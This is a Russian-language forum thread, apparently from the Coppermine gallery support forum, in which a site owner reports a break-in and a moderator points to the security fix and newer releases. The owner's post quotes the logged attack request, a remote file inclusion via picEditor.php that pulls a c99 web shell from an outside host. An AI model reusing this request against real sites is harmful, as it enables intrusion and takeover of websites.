Срочно ! Взломали фотогалерею. Привожу при&#1 Срочно ! Взломали фотогалерею. Привожу при&#1
 

News:

CPG Release 1.6.26
Correct PHP8.2 issues with user and language managers.
Additional fixes for PHP 8.2
Correct PHP8 error with SMF 2.0 bridge.
Correct IPTC supplimental category parsing.
Download and info HERE

Main Menu

Срочно ! Взломали фотогалерею. Привожу при

Started by pansionat, February 02, 2009, 06:40:06 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

pansionat

Срочно ! Взломали фотогалерею. К сожалению не очень сильно знаю английский. Но вот привожу лог залива постороних файлов через дырку в скрипте:
мой сайт/picEditor.php?img_dir=http://xakforum.altnet.ru/tmp_upload/files/c99shell.txt&CURRENT_PIC[filename]=/1.php

Надеюсь подправят уязвимость 

MISHA

Что бы Ктулху не воскрес, подпишись на RSS

pansionat

У меня версия этого файла 1.4.16
Но дело в том, что я сравнил файлы версий и разница тольв этом
Версия 1.4.16
<? starttable("100%", $lang_editpics_php['crop_title'], 3); ?>

Версия 1.4.19
<?php starttable("100%", $lang_editpics_php['crop_title'],?>

Неужели такое незначительное изменение устраняет проблему ?

MISHA

Что бы Ктулху не воскрес, подпишись на RSS

Makc666

То, что у Вас сделали, это уязвимость найденная и исправленная в версии 1.4.17
http://forum.coppermine-gallery.net/index.php/topic,51787.0.html

Также была и версия 1.4.19, которая тоже имела дыру:
http://forum.coppermine-gallery.net/index.php/topic,54235.0.html

Хочу обратить внимание, что уже вышла новая версия 1.4.20, где была исправлена серьезная уязвимость версии 1.4.19!